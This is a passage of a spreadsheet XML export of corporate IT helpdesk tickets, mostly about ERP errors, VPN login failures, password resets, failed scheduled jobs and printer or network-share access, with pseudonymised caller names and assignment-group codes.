    <s v="it help,_x000d__x000a__x000d__x000a_for dn# 9169292812, the post code is 1518 on the shipping label from kis as below. _x000d__x000a_but the correct post code should be 1478 as cec confirms it's same in customer master. _x000d__x000a_copy the screens below. _x000d__x000a__x000d__x000a_can you check what caused the wrong post code on the label?  "/>
    <s v="ovhtgsxd dcqhnrmy"/>
    <x v="17"/>
  </r>
  <r>
    <s v="rma process fault in erp"/>
    <s v="hello,_x000d__x000a__x000d__x000a__x000d__x000a_could you please resolve the following issue immediately?_x000d__x000a__x000d__x000a_issue: trying to rma with using &quot;zlx5&quot; which is the erp process for returning goods and there are the below screen shot shows fault._x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a_best "/>
    <s v="iwazgesl ydgqtpbo"/>
    <x v="17"/>
  </r>
  <r>
    <s v="engineering_tool update"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xwertljy.zrmlhkyq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a__x000d__x000a_new customer addition button is missing please update, matheywter urgent._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35359.4f8d67d0]_x000d__x000a_"/>
    <s v="xwertljy zrmlhkyq"/>
    <x v="25"/>
  </r>
  <r>
    <s v="zugriff auf verlauf m:\skv-alicona."/>
    <s v="hallo ,_x000a__x000a_folgende mitarbeiter benÃ¶tigen zugriff auf unten stehen verlauf_x000a__x000a_m:\skv-alicona_x000a__x000a_mitarbeiter: rhaycqjg arcgonvy (kudhnyuhnm), nfybpxdg yjtdkfuo (kesrgtyu), lxfnwyuv bqmjyprz (rockehsty) hgrvubzo wgyhktic (koiergyvh) und hnyeajrw ctxjsolz (simekdty)_x000a__x000a_vergleichsmitarbeiter: h. beckshtywsnh ( beckshtyw)_x000a_"/>
    <s v="hqyfebtd pkmyrdga"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp user profile for pthsqroz moedyanvess"/>
    <s v="i need to complete a npc task in erp, but i get error messages, see attachement._x000d__x000a__x000d__x000a_please cancel chg1145533 as this got created by mistake."/>
    <s v="juqpaxry ulqfbiog"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1132: web tier (epmsystem2) &amp; java server (epmsystem2) are down."/>
    <s v="HostName_1132 : oracle finance_app financial management - web tier (epmsystem2) - service monitor(unknown)_x000d__x000a_HostName_1132 : oracle finance_app financial management - java server (epmsystem2) - service monitor(unknown)_x000d__x000a_"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="drucker em26 geht nicht mehr"/>
    <s v="drucker em26 geht nicht mehr trotz mehrere druckauftrÃ¤ge_x000d__x000a_kein anderer drucker instaliert _x000d__x000a_bitte drucker em47 auch instalieren"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="41"/>
  </r>
  <r>
    <s v="unable to launch erp"/>
    <s v="unable to launch erp"/>
    <s v="sqgvrmhy eypjuowq"/>
    <x v="28"/>
  </r>
  <r>
    <s v="need access to emails of qiscgfjv.kxfdsijv@gmail.com for a year."/>
    <s v="need access to emails of qiscgfjv.kxfdsijv@gmail.com for a year._x000a__x000a_ph: "/>
    <s v="khrflgcj zxojidhe"/>
    <x v="26"/>
  </r>
  <r>
    <s v="rickjdt has confirmed that the password is working after reset. "/>
    <s v="rickjdt has confirmed that the password is working after reset. "/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte um freigabe von m:\skv-alicona."/>
    <s v="bitte um freigabe von m:\skv-alicona. /hnyeajrw ctxjsolz"/>
    <s v="hnyeajrw ctxjsolz"/>
    <x v="11"/>
  </r>
  <r>
    <s v="brauche freigabe fÃ¼r m:\skv-alicona."/>
    <s v="brauche freigabe fÃ¼r m:\skv-alicona. /hgrvubzo wgyhktic"/>
    <s v="hgrvubzo wgyhktic"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
    <s v="erp SID_34 password reset "/>
    <s v="ylhukdof fiymhdnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 05:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 05:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="brauche freigabe fÃ¼r m:\skv-alicona."/>
    <s v="brauche freigabe fÃ¼r m:\skv-alicona. /lxfnwyuv bqmjyprz"/>
    <s v="lxfnwyuv bqmjyprz"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bitte freigabe fÃ¼r m:\skv-alicona einrichten."/>
    <s v="bitte freigabe fÃ¼r m:\skv-alicona einrichten. /nfybpxdg yjtdkfuo"/>
    <s v="nfybpxdg yjtdkfuo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bitte freigabe fÃ¼r m:\skv-alicona einrichten."/>
    <s v="bitte freigabe fÃ¼r m:\skv-alicona einrichten. /rhaycqjg arcgonvy"/>
    <s v="rhaycqjg arcgonvy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="www.company.com web site - engineering_tool &quot;product selector&quot; link reported as not working"/>
    <s v="mikhghytr kinsella has reported that the  &quot;product selector&quot; link does not work www.company.com home page_x000d__x000a_it allows selection as far as material type and then goes to a contacts page"/>
    <s v="jyervicn ckujvgri"/>
    <x v="50"/>
  </r>
  <r>
    <s v="erp &amp; other internet service are slow for all users"/>
    <s v="erp &amp; other internet service are slow for all users"/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ainw8911993 new india patching_antivirus_sw desktop server is down"/>
    <s v="this pc is offline since 30th aug."/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to download engineering_tools ."/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkezwolt.fgnqzeai@gmail.com_x000d__x000a__x000d__x000a_kindly look into , unable to extract and open engineering_tool files._x000d__x000a__x000d__x000a_please revert back with top priority and same case studies are required to be discussed._x000d__x000a__x000d__x000a_get the below error._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image004.jpg@01SID_3534d.2ab61030]_x000d__x000a__x000d__x000a_best "/>
    <s v="vkezwolt fgnqzeai"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_3182 failed in job_scheduler at: 09/20/2016 05:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3182 failed in job_scheduler at: 09/20/2016 05:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="bitte die drucker umstellen und konfigurieren"/>
    <s v="bitte die drucker umstellen und konfigurieren /vaigycet jtgmpdcr"/>
    <s v="vaigycet jtgmpdcr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="error message during route card release"/>
    <s v="_x000a__x000a_received from: phqwmniy.kjucgqom@gmail.com_x000a__x000a_hello,_x000a__x000a_while route card release error message appearing  and route card not get printed:_x000a_[cid:image001.jpg@01SID_3534a.f3add890]_x000a__x000a_required help in resolving the issue,_x000a_[cid:image002.png@01SID_3534a.f3add89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x v="44"/>
  </r>
  <r>
    <s v="erp net weaver funktioniert nicht. pc: empw7000230"/>
    <s v="erp net weaver funktioniert nicht. pc: empw7000230"/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telefon defekt. gigaset charger for sl3 professional. chargeur posrt poste 8010 sl3; "/>
    <s v="ft584095 octophon sl3 prof. ladeschale mnr 51346687; s30852-s1982-r141-5; telefonnummer: 09279-80419; bÃ¼ro prozessflussverantwortliche scdp"/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="32"/>
  </r>
  <r>
    <s v="wrong printing on awa voucher inwarehouse_tools "/>
    <s v="hello, when awa 81408476 - order with voucher - the printing says the discount is 130% - which is wrong.  please check and correct this. example in attachment. "/>
    <s v="frtwncbv yvxrspqo"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp frequent disconnections"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_there is frequent disconnections in erp &amp; is very slow also._x000d__x000a_please have it checked at the earliest. "/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="3"/>
  </r>
  <r>
    <s v="unable to login to windows "/>
    <s v="unable to login to windows _x000a_error :- domain controller logon balancing error_x000a_contact no:-_x000a_mobile:-_x000a_location :-germany (germany)_x000a__x000a__x000a_"/>
    <s v="zfhqxjms ztfcobhy"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="fdbgoamk hygxzkla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 04:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 04:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="wakqbrfx olynbudg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2406b failed in job_scheduler at: 09/20/2016 04:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2406b failed in job_scheduler at: 09/20/2016 04:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="passwort ist abgelaufen. bitte reset einleiten. auch fÃ¼r das iphone."/>
    <s v="passwort ist abgelaufen. bitte reset einleiten. auch fÃ¼r das iphone. /jxphgfmb gjbtuwek"/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp SID_1 access"/>
    <s v="while starting erp SID_1 i get an error logon balancing error 88_x000a__x000a_see attachment_x000a__x000a_this is for user vadnhyt and stegyhui and manjhyt_x000a__x000a_"/>
    <s v="urvitans laqdwvgo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="india kirty, packet drops on telecom_vendor_1 link since at 12:48 am et on 9/20. telecom_vendor_1#24090835 "/>
    <s v="india kirty, packet drops on telecom_vendor_1 link since at 12:48 am et on 9/20."/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp business_client ä¸èƒ½ä½¿ç”¨ï¼Œæ›´æ–°msdotnet_461_business_client_50_SID_792ã€‚"/>
    <s v="æ›´æ–°msdotnet_461_business_client_50_SID_792 ."/>
    <s v="okebwncv zyxvwkpn"/>
    <x v="31"/>
  </r>
  <r>
    <s v="please check order# 35042103 - voucher v-00011418"/>
    <s v="the order header is showing this voucher code, and the line item details are also showing this voucher code under &quot;additional data b&quot;. nevertheless, table vbap-zzcmpgn_id is empty._x000d__x000a_the printed acknowledgement and inwarehouse_tool are not referring this voucher code, but pricing has considered the voucher discount._x000d__x000a_something is not correct...._x000d__x000a__x000d__x000a_if voucher is not relevant for this customer/ship-to, then it should not consider voucher discount."/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="12"/>
  </r>
  <r>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 85% space consumed. space available: 4.6 g"/>
    <s v="HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 85% space consumed. space available: 4.6 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="38"/>
  </r>
  <r>
    <s v="request"/>
    <s v="_x000a__x000a_received from: yxliakph.soucfnqe@gmail.com_x000a__x000a_sir,_x000a_the salary slip user id is locked for our  apprentice  jahtyuj-with id no:  20286786._x000a_pl. help to retrieve the same_x000a__x000a__x000a__x000a_best  "/>
    <s v="yxliakph soucfnqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i can't reiceve e-mail form my mobile phone."/>
    <s v="could you reset my company mobile phone. details are below._x000d__x000a__x000d__x000a_cihaz modeli: iphone7c2_x000d__x000a_cihaz tÃ¼rÃ¼: iphone_x000d__x000a_cihaz kimliÄŸi: 8hnorau8ap7era614bd7lb3t7c_x000d__x000a_cihaz iÅŸletim sistemi: ios 10.0.sartlgeo lhqksbdx4a403_x000d__x000a_cihaz kullanÄ±cÄ± aracÄ±sÄ±: apple-iphone7c2/1401.403_x000d__x000a_cihaz imei: 352090078991606_x000d__x000a_exchange activesync sÃ¼rÃ¼mÃ¼: 16.1_x000d__x000a_cihaz eriÅŸim durumu: quarantined_x000d__x000a_cihaz eriÅŸim durumu nedeni: global_x000d__x000a_"/>
    <s v="wmrozfpt ltgcofqp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant create a delivery note for a stock transfer"/>
    <s v="SID_34_x000d__x000a_create a delivery note for mm6339959 (5018954001) sto to apac_x000d__x000a_see error message on att._x000d__x000a_"/>
    <s v="qpiojxcl dxkcljew"/>
    <x v="5"/>
  </r>
  <r>
    <s v="add printer ag25  10.165.44.227"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am trying to add this printer but i receive the following message._x000d__x000a_please enable it so that i can connect to this printer which is in the erp room here in germany, where i am attending a workshop for 2 weeks until 1 october._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01SID_3531d.293ae2b0]_x000d__x000a__x000d__x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software  -  description"/>
    <s v="telephony_software  -  department description_x000d__x000a__x000d__x000a_for the germany users the description of the department was updated to ifbg._x000d__x000a_as we would have expected cfc (customer fulfillment center) instead please let me know what it stands for and for what reason it has been changed."/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please fix the issues mentioned under description in SID_34. swathi and you coordinate and work on it please.."/>
    <s v="1) sm21 - transaction canceled fp 045 ( vbkpf 5432 2016 3611112300 )_x000d__x000a__x000d__x000a_2) sm21 - nieconn_refused(-10),remote communication failure with partner _x000d__x000a__x000d__x000a_3) SID_183 - update terminated - system error: j_1b_nfe_update_xblnr .error during update table bkpf"/>
    <s v="mnxbeuso rfmdlwuo"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp ticket "/>
    <s v="erp ticket"/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wireless access companyguest request"/>
    <s v="_x000a__x000a_received from: sbgvrncj.idfhtoqv@gmail.com_x000a__x000a_hello,_x000a_please usa kahrthyeuiuiw koithc from hr_tool wireless access for germany germany from 20-23 september and confirm when done._x000a__x000a_kathatryuna.koithc@hr_tool.com&lt;mailto:kathatryuna.koithc@hr_tool.com&gt;   sctqwgmj yambwtfk_x000a__x000a_many "/>
    <s v="sbgvrncj idfhtoqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vsbhyrt  is unable to open eng engineering tool nor able to log in to password_management_tool to reset passwords -"/>
    <s v="vsbhyrt  is unable to open eng engineering tool nor able to log in to password_management_tool to reset passwords -_x000d__x000a_pls help._x000d__x000a__x000d__x000a_"/>
    <s v="rmdtqfxa fwpnqdxo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to browse company collaboration_platform site"/>
    <s v="unable to browse company collaboration_platform site"/>
    <s v="tfaweyjd mdzrgxij"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/20/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/20/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="reset password for erp SID_34 production - user id = laijuttr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wyxqkzmf.urigtqnp@gmail.com_x000d__x000a__x000d__x000a_hi help desk_x000d__x000a__x000d__x000a_kindly help to reset my password for SID_34 production as i am not able to login after changed password this morning.  "/>
    <s v="wyxqkzmf urigtqnp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="he is not able to click on the icons."/>
    <s v="he is not able to click on the icons. he is able to login to citrix. please refer to the screenshot."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="re: ticket_no1551447 -- comments added"/>
    <s v="_x000a__x000a_received from: peuckbvr.tjihmgsv@gmail.com_x000a__x000a_hello bohyub &amp; pradtheyp,_x000a__x000a_yesterday jaya conveyed all that we discussed about changes required in graphics portal._x000a__x000a_all requirements are fulfilled, you please go-ahead and change._x000a__x000a_"/>
    <s v="peuckbvr tjihmgsv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="hzetqwba tmsbnfkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="beim benutzer klarp am pc evhw8114323 funktioniert das erp nicht richtig."/>
    <s v="er hat sich bereits am pc evhw8114113 geuacyltoe hxgayczeet und da funktioniert es einwandfrei."/>
    <s v="dtrvxiuq bwuqdtfo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34 account "/>
    <s v="unable to login to erp SID_34 account "/>
    <s v="mjsetabg oiurnzaq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1330 failed in job_scheduler at: 09/20/2016 00:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1330 failed in job_scheduler at: 09/20/2016 00:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="ecpkblrs buzgjypk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="xnmgsawf bwghcmxq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm portal login issue_ kxmidsga zokivdfa"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_i am not able to access the &quot;crm&quot; portal. please do the need full._x000d__x000a__x000d__x000a_screen shot of error attached._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35321.1ca7c050]_x000d__x000a__x000d__x000a_with best "/>
    <s v="kxmidsga zokivdfa"/>
    <x v="22"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 09/19/2016 23:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 09/19/2016 23:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="computer running slow "/>
    <s v="computer running slow "/>
    <s v="uaevikhj uazfcwgm"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp "/>
    <s v="_x000d__x000a__x000d__x000a_received from: hmjdrvpb.komuaywn@gmail.com_x000d__x000a__x000d__x000a_hi it,_x000d__x000a__x000d__x000a_i regularly have trouble with erp lagging, particularly it seems after 12pm our time._x000d__x000a_last week, especially friday it was very bad all day._x000d__x000a_yesterday and today, again it seems to lag after that 12 noon time._x000d__x000a_this is becoming continuously embarrassing during phone calls when i am required to search for stock or quote/order over the phone as i have to apologise for the system taking so long._x000d__x000a__x000d__x000a_there are two other csr's in the building, uisewznr ewtmkphs rarely has the same trouble (his system seems faster though), much faster than mine or duoyrpvi wgjpviul, amy's system will lag but not as much as mine._x000d__x000a__x000d__x000a_can you please shed some light on this scenario?_x000d__x000a__x000d__x000a_note:  it is more convenient for this office if i can be contacted mid/late mornings._x000d__x000a__x000d__x000a_kind "/>
    <s v="hmjdrvpb komuaywn"/>
    <x v="13"/>
  </r>
  <r>
    <s v="shipping dashbankrd - data/information not displayed when i select &quot;previous week&quot;."/>
    <s v="shipping dashbankrd - tabs which have data refresh issue: (maybe data is not being refreshed daily or something has broken with respect to daily extraction&quot;_x000d__x000a_freight cost- region analysis_x000d__x000a_packages dashbankrd_x000d__x000a_%total freight cost by sales org and shipping location_x000d__x000a_export indicator analysis_x000d__x000a_delivery type analysis_x000d__x000a_carrier wise analysis_x000d__x000a_shipping statistics_x000d__x000a__x000d__x000a_data is not being refreshed daily as i can't find reports when i select &quot;previous week&quot;."/>
    <s v="upfthmjx fdxrpqat"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="kailyenh zfyvkopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2555 failed in job_scheduler at: 09/19/2016 22:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2555 failed in job_scheduler at: 09/19/2016 22:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="problems with ap vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: elixsfvu.pxwbjofl@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i have problems using ap vpn from home._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35323.a62bff10]_x000d__x000a__x000d__x000a_best "/>
    <s v="elixsfvu pxwbjofl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kis documents will not generate because the sto has no pricing."/>
    <s v="kis documents will not generate because the sto has no pricing._x000d__x000a_dn 9169203442 sto 4908112195"/>
    <s v="lzspyjki smdbqnef"/>
    <x v="17"/>
  </r>
  <r>
    <s v="wrong unit price on inwarehouse_tool "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ovhtgsxd.dcqhnrmy@gmail.com_x000d__x000a__x000d__x000a_it help,_x000d__x000a__x000d__x000a_we have one shipment from apac to indonesia as attachment.  the unit price is 67.89 on the inwarehouse_tool from erp, but it should be 0.04/pcs._x000d__x000a__x000d__x000a_can you check what caused the wrong price on inwarehouse_tool?_x000d__x000a__x000d__x000a_"/>
    <s v="ovhtgsxd dcqhnrmy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ç”µè„‘æ— æ³•è¿žæŽ¥å…¬å…±ç›˜ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º"/>
    <s v="ç”µè„‘æ— æ³•è¿žæŽ¥å…¬å…±ç›˜ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º"/>
    <s v="basqoyjx frvwhbse"/>
    <x v="30"/>
  </r>
  <r>
    <s v="usa pc companyst-apc-01 in the pvd area cannot connect to \\srvlavstorage01\groups but can connect to the internet"/>
    <s v="usa pc companyst-apc-01 in the pvd area needs to be on the network in order to print to the printers in pvd."/>
    <s v="kdjfhwua arfpnhbj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="0"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="-user unable  tologin to vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn using the vpn company vpn link._x000d__x000a_-issue resolved."/>
    <s v="awpcmsey ctdiuqwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am not able to log into my vpn. when i am trying to open a new session it is going to the &quot;your session is finished&quot; p"/>
    <s v="name:mehrugshy_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dcvphjru.ybomrjst@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i am not able to log into my vpn. when i am trying to open a new session it is going to the &quot;your session is finished&quot; page"/>
    <s v="dcvphjru ybomrjst"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="kailyenh zfyvkopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="ajgnibkx zixmcjgu"/>
    <x v="0"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="-user unable  tologin to vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn using the vpn company vpn link._x000d__x000a_-issue resolved."/>
    <s v="rhwsmefo tvphyura"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn connectivity"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gmrxwqlf.vzacdmbj@gmail.com_x000d__x000a__x000d__x000a_i can't reconnect to the vpn.  i hit click here and screen does not change.  i tried closing and relaunching and have some result.  i tried restarting my computer and have same result._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35295.4882bb80]_x000d__x000a__x000d__x000a_best "/>
    <s v="gmrxwqlf vzacdmbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="referencing ticket ticket_no1499477. customer is stating the barcodes are not scannable on the label. "/>
    <s v="please revisit ticket ticket_no1499477 and review the fastenal label as the customer is claiming the barcode that we output from from the zebra(z1) printers do not scan. will need to replicate the barcode located on the labels that we currently output from the datamax (m1)._x000d__x000a__x000d__x000a_see attached."/>
    <s v="xnqzhtwu hivumtfz"/>
    <x v="20"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="objrkcwe zamgitwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="jborwynt gidxbfrq"/>
    <x v="0"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="-user unable  tologin to vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn using the vpn company vpn link._x000d__x000a_-issue resolved."/>
    <s v="hxripljo efzounig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access na vpn"/>
    <s v="when i click on &quot;click here&quot; to enter a new session the screen just repeats itself instead of prompting for user id and password as it usually does.  i am able to use euro vpn through a link provided to me by email."/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_are we having vpn issues i can't get logged in to vpn_x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="vpn not working- vpn.company.com  link is giving error"/>
    <s v="sntvfpbl vtokgley"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" germany steel plant the programdnty EU_tool does not run. +499433255366"/>
    <s v="name:cfokqnhz notxygdz_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:cfokqnhz.notxygdz@gmail.com_x000a_customer number:_x000a_telephone:0_x000a_summary:hello,_x000a__x000a_in germany steel plant the programdnty EU_tool does not run._x000a__x000a_please check the programdnty!_x000a__x000a_"/>
    <s v="cfokqnhz notxygdz"/>
    <x v="25"/>
  </r>
  <r>
    <s v="vpn not working"/>
    <s v="vpn not working"/>
    <s v="elphfvdt ileozacs"/>
    <x v="0"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="-user unable  tologin to vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn using the vpn company vpn link._x000d__x000a_-issue resolved."/>
    <s v="cziadygo veiosxby"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn login issue."/>
    <s v="vpn login issue._x000d__x000a_-user unable  tologin to vpn._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the company vpn using the vpn company vpn link._x000d__x000a_-issue resolved."/>
    <s v="suyighpt wifujdvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable  tologin to vpn."/>
    <s v="name:lizhwdoe mjudivse_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lizhwdoe.mjudivse@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can't login in to vpn"/>
    <s v="lizhwdoe mjudivse"/>
    <x v="0"/>
  </r>
  <r>
    <e v="#NAME?"/>
    <s v="name:wvqgbdhm fwchqjor_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wvqgbdhm.fwchqjor@gmail.com_x000a_customer number:_x000a_telephone:-not available_x000a_summary:can't get into vpn - need to be on at 4:30 est and it wont' happen please help aerp!"/>
    <s v="wvqgbdhm fwchqjor"/>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zyxjagro vjgozhpn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my distributor_tool account is not working ! my dashbankrd is gone/ i cannot select sales org/ cannot select customers"/>
    <s v="my distributor_tool account is not working ! my dashbankrd is gone/ i cannot select sales org/ cannot select customers"/>
    <s v="kzbrimwx dconpwbu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to tjlizqgc ngvwoukp' calendars "/>
